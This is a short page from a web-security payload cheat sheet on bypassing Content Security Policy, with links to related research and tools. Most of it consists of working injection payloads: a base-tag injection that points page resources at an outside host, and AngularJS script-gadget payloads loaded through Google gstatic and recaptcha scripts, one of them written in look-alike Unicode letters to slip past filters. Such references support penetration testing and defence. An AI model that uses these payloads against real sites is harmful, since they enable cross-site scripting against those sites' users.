CSP Bypass

CSP Evaluator

LogoCSP Evaluator

CSP Bypass

CSP Bypass Search

Weak CSP Bypass

1'"--><Base Href=//X55.is?

Credits: @KN0X55

LogoGitHub - renniepak/CSPBypassGitHub
CSP Bypass Search

CSP Bypass for gstatic

<πšœπšŒπš›πš’πš™πš πšœπš›πšŒ='//𝚠𝚠𝚠.πšπšœπšπšŠπšπš’πšŒ.πšŒπš˜πš–/πš›πšŽπšŒπšŠπš™πšπšŒπš‘πšŠ/πšŠπš‹πš˜πšžπš/πš“πšœ/πš–πšŠπš’πš—.πš–πš’πš—.πš“πšœ'></πšœπšŒπš›πš’πš™πš><πš’πš—πš™πšžπš πš’πš=𝚑 πš—πš-𝚏𝚘𝚌𝚞𝚜=$πšŽπšŸπšŽπš—πš.πšŒπš˜πš–πš™πš˜πšœπšŽπšπ™ΏπšŠπšπš‘()|πš˜πš›πšπšŽπš›π™±πš’:'(𝚣=πšŠπš•πšŽπš›πš)(𝟷)'>

Nuclei Templates

LogoCSP Bypass (DAST) - Nuclei Templates v10.1.5 πŸŽ‰ β€” ProjectDiscovery Blog

Recaptcha Abuse

<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>

<img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>
CSP bypass on PortSwigger.net using Google script resources - Johan CarlssonJohan Carlsson

Form Hijacking to bypass CSP

LogoUsing form hijacking to bypass CSPPortSwigger Research

Resources

LogoContent Security Policy (CSP) Bypass | HackTricks
PreviousSSI / ESI InjectionNextFile Inclusion LFI / RFI

Last updated

Was this helpful?